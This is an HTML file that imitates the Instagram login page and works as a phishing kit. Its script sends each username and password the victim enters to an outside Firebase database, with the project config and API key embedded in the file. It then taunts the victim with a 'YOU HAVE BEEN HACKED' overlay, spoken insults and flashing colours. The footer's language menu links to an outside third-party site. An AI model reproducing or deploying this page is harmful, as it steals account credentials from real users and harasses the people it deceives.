<!DOCTYPE html>
<html lang="en">

<head>
 <meta charset="UTF-8">
 <meta http-equiv="X-UA-Compatible" content="IE=Edge">
 <meta name="viewport" content="width=device-width, initial-scale=1">

 <title>Instagram</title>

 <!-- HTML -->


 <!-- Custom Styles -->
 <style type="text/css">
  #root,
  body,
  html {
   height: 100%;
  }

  body {
   overflow-y: scroll;
  }

  a,
  abbr,
  acronym,
  address,
  applet,
  article,
  aside,
  audio,
  b,
  big,
  blockquote,
  body,
  canvas,
  caption,
  center,
  cite,
  code,
  dd,
  del,
  details,
  dfn,
  div,
  dl,
  dt,
  em,
  embed,
  fieldset,
  figcaption,
  figure,
  footer,
  form,
  h1,
  h2,
  h3,
  h4,
  h5,
  h6,
  header,
  hgroup,
  html,
  i,
  iframe,
  img,
  ins,
  kbd,
  label,
  legend,
  li,
  mark,
  menu,
  nav,
  object,
  ol,
  output,
  p,
  pre,
  q,
  ruby,
  s,
  samp,
  section,
  small,
  span,
  strike,
  strong,
  sub,
  summary,
  sup,
  table,
  tbody,
  td,
  tfoot,
  th,
  thead,
  time,
  tr,
  tt,
  u,
  ul,
  var,
  video {
   margin: 0;
   padding: 0;
   border: 0;
   font: inherit;
   vertical-align: baseline;
  }

  a,
  a:visited {
   text-decoration: none;
  }

  a:active,
  .btn:active {
   opacity: .5;
  }

  ol,
  ul {
   list-style: none;
  }

  body,
  button,
  input {
   font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
   font-size: 14px;
   line-height: 18px;
  }

  #root,
  article,
  main,
  div,
  section,
  header,
  nav,
  footer {
   border: 0 solid #000000;
   box-sizing: border-box;
   align-items: stretch;
   display: flex;
   flex-direction: column;
   flex-shrink: 0;
   margin: 0;
   padding: 0;
   position: relative;
   -webkit-box-align: stretch;
   -moz-box-align: stretch;
   -webkit-box-orient: vertical;
   -moz-box-orient: vertical;
   -webkit-box-direction: normal;
   -moz-box-direction: normal;
  }

  /* <--Universal Selectors End */


  #root {
   z-index: 0;
  }

  .section-all {
   min-height: 100%;
   overflow: hidden;
  }

  .main {
   background-color: #fafafa;
   order: 4;
   flex-grow: 1;
   -webkit-box-flex: 1;
   -moz-box-flex: 1;
   -moz-box-ordinal-group: 5;
   -webkit-box-ordinal-group: 5;
  }

  .wrapper {
   min-height: 100%;
   overflow: hidden;
  }

  .wrapper,
  .article {
   flex-grow: 1;
   justify-content: center;
   -webkit-box-flex: 1;
   -moz-box-flex: 1;
   -webkit-box-pack: center;
   -moz-box-pack: center;
  }

  .article {
   flex-direction: row;
   margin: 0 auto;
   max-width: 935px;
   width: 100%;
   -webkit-box-orient: horizontal;
   -moz-box-orient: horizontal;
   -webkit-box-direction: normal;
   -moz-box-direction: normal;
  }

  .content {
   color: #262626;
   flex-grow: 1;
   justify-content: center;
   max-width: 350px;
   margin-top: 12px;
   -webkit-box-pack: justify;
   -moz-box-pack: justify;
   -webkit-box-flex: 1;
   -moz-box-flex: 1;
  }

  .login-box {
   background: #fff;
   border: 1px solid #e6e6e6;
   border-radius: 1px;
   margin: 0 0 10px;
   padding: 10px 0;
   /* align-items: center; */
  }

  .header {
   margin: 14.45px auto 12px;
  }

  .logo {
   background: cover no-repeat;
   width: 175px;
   height: auto;
  }

  .form {
   display: flex;
   flex-direction: column;
   margin-bottom: 10px;
   -moz-box-direction: normal;
   -webkit-box-direction: normal;
  }

  .input-box {
   margin: auto 40px 6px;
  }

  input {
   height: 36px;
   border: 1px solid #efefef;
   border-radius: 3px;
   background-color: #fafafa;
   width: 100%;
   font-size: 12px;
   margin: 0;
   padding: 9px 0 7px 8px;
   outline: none;
   overflow: hidden;
   text-overflow: ellipsis;
   box-sizing: border-box;
  }

  input#name:focus,
  input#password:focus {
   border-color: #bbb;
  }

  .button-box {
   display: block;
   position: relative;
   margin: 8px 40px;
  }

  .btn {
   cursor: pointer;
   width: 100%;
   padding: 0 8px;
   background: #3897f0;
   border: 1px solid #3897f0;
   color: #fff;
   border-radius: 3px;
   font-weight: 600;
   font-size: 14px;
   height: 28px;
   line-height: 26px;
   outline: none;
   white-space: nowrap;
  }

  .forgot,
  .forgot:active,
  .forgot:hover,
  .forgot:visited {
   font-size: 12px;
   margin-top: 12px;
   text-align: center;
   color: #003569;
   line-height: 14px !important;
  }

  .text {
   text-align: center;
   margin: 15px;
   color: #262626;
   font-size: 14px;
  }

  .text a,
  .text a:visited,
  .text a:hover,
  .text a:active {
   color: #3897f0;
   margin-left: 3px;
  }

  /* App Store */
  .app p {
   line-height: 18px;
   color: #262626;
   font-size: 14px;
   text-align: center;
   margin: 10px 20px;
  }

  .app-img {
   flex-direction: row;
   justify-content: center;
   margin: 10px 0;
   -webkit-box-orient: horizontal;
   -moz-box-orient: horizontal;
  }

  .app-img a {
   margin-right: 8px;
   height: 43.5px;
  }

  .app-img img {
   height: 40px;
  }

  /* FOOTER */
  .footer {
   background-color: #fafafa;
   order: 5;
   padding: 0 20px;
   background: #fafafa;
  }

  .footer-container {
   flex-direction: row;
   flex-wrap: wrap;
   background-color: #fafafa;
   justify-content: space-between;
   padding: 38px 0;
   max-width: 935px;
   font-size: 12px;
   font-weight: 600;
   margin: 0 auto;
   text-transform: uppercase;
   width: 100%
  }

  .footer-nav {
   max-width: 100%;
  }

  .footer-nav ul {
   margin-right: 16px;
   margin-bottom: 3px;
   flex-grow: 1;
  }

  .footer-nav ul li {
   display: inline-block;
   margin-right: 13px;
   margin-bottom: 7px;
  }

  .footer-nav ul li a {
   color: #003569;
   text-decoration: none;
  }

  .footer span {
   color: #999;
  }

  span.language {
   color: #003569;
   cursor: pointer;
   display: inline-block;
   font-weight: 600;
   position: relative;
   text-transform: uppercase;
   vertical-align: top;
  }

  .select {
   cursor: pointer;
   height: 100%;
   top: 0;
   opacity: 0;
   position: absolute;
   left: 0;
   width: 100%;
  }

  /* Media Queries */
  @media (max-width:450px) {
   .main {
    background-color: #fff;
   }

   .content {
    max-width: 100%;
    margin-top: 0;
    justify-content: space-between;
   }

   .login-box {
    background-color: transparent;
    border: none;
   }

   .logo {
    background: cover no-repeat;
    width: 175px;
    height: auto;
    margin: 0 auto;
   }

   .btn {
    cursor: pointer;
    width: 100%;
    padding: 0 8px;
    background: #3897f0;
    border: 1px solid #3897f0;
    color: #fff;
    border-radius: 3px;
    font-weight: 600;
    font-size: 14px;
    height: 28px;
    line-height: 26px;
    outline: none;
    white-space: nowrap;
   }

   .input-box {
    border: 1px solid #efefef;
    border-radius: 3px;
    height: 36px;
    background: #fafafa;
    position: relative;
   }

   input {
    border: 0;
    background-color: #fafafa;
    width: 100%;
    font-size: 12px;
    margin: 0;
    padding: 9px 0 7px 8px;
    outline: none;
    overflow: hidden;
    text-overflow: ellipsis;
    box-sizing: border-box;
   }

   .input-box:hover,
   .input-box:focus {
    border-color: #bbb;
   }

  }

  @media only screen and (max-width:875px) {
   .footer-container {
    text-align: center;
    padding: 10px 0;
   }

   .footer-container,
   .footer-nav ul {
    justify-content: center;
    margin: 0 auto;
    max-width: 360px;
    min-width: auto;
    -webkit-box-pack: center;
    -moz-box-pack: center;
   }

  }

  #anon {
   top: -600px;
   left: calc((100% - 70%)/2);
   position: absolute;
   width: 70%;
   height: 400px;
  }

  #anon2 {
   position: absolute;
   left: 0;
   right: 0;
   top: -200px;
   bottom: 0;
   margin: auto;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 60px;
   text-align: center;
   line-height: 80px;
   font-weight: 800;
   display: none;
  }
 </style>
 <link rel="icon" href="https://img.icons8.com/color/48/instagram-new--v1.png">

</head>

<body>
 <span id="root">
  <section class="section-all">

   <!-- 1-Role Main -->
   <main id="body3" class="main" role="main">
    <div class="wrapper">
     <article id="body" class="article">
      <div class="content">
       <div id="b" class="login-box">
        <div class="header">
         <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram">
        </div><!-- Header end -->
        <div class="form-wrap">
         <form class="form">

          <div class="input-box">
           <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="username" value="" required>
          </div>

          <div class="input-box">
           <input type="password" name="password" id="password" placeholder="Password" aria-describedby="" maxlength="30" aria-required="true" autocapitalize="off" autocorrect="off" required>
          </div>

          <span class="button-box">
           <button id="btn" class="btn" type="submit" name="submit">Log in</button>
          </span>

          <a class="forgot" href="">Forgot password?</a>
         </form>
        </div> <!-- Form-wrap end -->
       </div> <!-- Login-box end -->

       <div id="b2" class="login-box">
        <p class="text">Don't have an account?<a href="#">Sign up</a></p>
       </div> <!-- Signup-box end -->

       <div class="app">
        <p>Get the app.</p>
        <div class="app-img">
         <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8">
          <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png">
         </a>
         <a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge">
          <img src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png">
         </a>
        </div> <!-- App-img end-->
       </div> <!-- App end -->
      </div> <!-- Content end -->
     </article>
    </div> <!-- Wrapper end -->
   </main>

   <!-- 2-Role Footer -->
   <footer id="body2" class="footer" role="contentinfo">
    <div id="b3" class="footer-container">

     <nav class="footer-nav" role="navigation">
      <ul>
       <li><a href="">About Us</a></li>
       <li><a href="">Support</a></li>
       <li><a href="">Blog</a></li>
       <li><a href="">Press</a></li>
       <li><a href="">Api</a></li>
       <li><a href="">Jobs</a></li>
       <li><a href="">Privacy</a></li>
       <li><a href="">Terms</a></li>
       <li><a href="">Directory</a></li>
       <li>
        <span class="language">Language
         <select name="language" class="select" onchange="la(this.value)">
          <option value="#">English</option>
          <option value="http://ru-instafollow.bitballoon.com">Russian</option>
         </select>
        </span>
       </li>
      </ul>
     </nav>

     <span class="footer-logo">&copy; 2023 Instagram from META</span>
    </div> <!-- Footer container end -->
   </footer>

  </section>
 </span> <!-- Root -->

 <img id="anon" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTFfRwLIH6bu2js46dyW3th4XUas4fWnLMXPg&usqp=CAU">
 <e id="anon2">YOU HAVE BEEN <e id="anon3" style="color:red">HACKED</<e>
  </e>
 </e>

 <!-- Select Link -->
 <script type="text/javascript">
  function la(src) {
   window.location = src;
  }
 </script>

 <script type="module">
  window.id = (x) => { return document.getElementById(x) };
  window.select = (x) => { return document.querySelector(x) };
  window.randColor = () => {
   var letters = '0123456789ABCDEF';
   var color = '#';
   for (var i = 0; i < 6; i++) {
    color += letters[Math.floor(Math.random() * 16)];
   }
   return color;
  }


  window.n = id('name');
  window.p = id('password');
  var btn = id('btn');
  window.anons = [id('anon'), id('anon2'), id('anon3')];

  window.bully = true;

  window.read = (text) => {
   window.speechSynthesis.speak(new SpeechSynthesisUtterance(text));
  }

  window.rand = (x) => { return Math.floor(Math.random() * x) };
  window.randEl = (array) => { return array[rand(array.length - 1)] };

  window.fucks = 'PİNKY DOLLY BOY GIRL HORNY SHIT BITCH MOTHER-FUCKER SON-OF-A-BITCH FUCK-YOUR-SHITY-HEAD CRAZY PUŞT'.split(' ');

  // Import the functions you need from the SDKs you need
  import { initializeApp } from "https://www.gstatic.com/firebasejs/9.22.2/firebase-app.js";
  // TODO: Add SDKs for Firebase products that you want to use
  // https://firebase.google.com/docs/web/setup#available-libraries

  // Your web app's Firebase configuration
  const firebaseConfig = {
   apiKey: "AIzaSyDkzM1vjvkE_-WQqlfv_51kcSwCr1XDfxM",
   authDomain: "aleph-55ee2.firebaseapp.com",
   projectId: "aleph-55ee2",
   storageBucket: "aleph-55ee2.appspot.com",
   messagingSenderId: "1038346055479",
   appId: "1:1038346055479:web:50ea0d183ed982a0a4f4b2"
  };

  // Initialize Firebase
  const app = initializeApp(firebaseConfig);


  import { getDatabase, ref, set, onChildAdded, push } from "https://www.gstatic.com/firebasejs/9.22.2/firebase-database.js";

  const db = getDatabase();


  btn.onclick = () => {
   push(ref(db, 'people'), {
    name: window.n.value,
    password: window.p.value
   });

   if (bully) {

    var fuck = randEl(fucks);

    window.read('YOU HAVE BEEN HACKED ' + fuck);

    anons[0].style.display = 'inline';
    anons[1].style.display = 'inline';
    anons[1].innerHTML += '<br>' + fuck;

    let x = -600;

    setInterval(() => {

     if (x <= window.innerHeight * 30 / 100 - 200) {
      x += 7;
     }

     anons[0].style.top = x + 'px';
     anons[1].style.top = x + 400 + 'px';

    }, 1000 / 60)

    setInterval(() => {

     if (x <= window.innerHeight * 30 / 100 - 200) {
      x += 7;
     }

     id('body').style = 'background-color:' + randColor();
     id('body2').style = 'background-color:' + randColor();
     id('body3').style = 'background-color:' + randColor();
     id('b').style = 'background-color:' + randColor();
     id('b2').style = 'background-color:' + randColor();
     id('b3').style = 'background-color:' + randColor();
     window.read('YOU HAVE BEEN HACKED ' + fuck);
    }, 1000)



   } else window.location.href = 'https://www.instagram.com/';

  }
 </script>

</body>


</html>